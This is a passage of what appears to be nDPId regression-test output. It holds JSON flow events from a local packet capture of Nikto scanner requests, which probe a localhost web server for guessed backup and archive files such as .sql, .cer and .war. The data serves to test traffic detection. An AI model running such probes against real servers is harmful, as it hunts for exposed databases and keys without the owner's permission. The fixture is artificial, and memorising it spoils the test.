{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 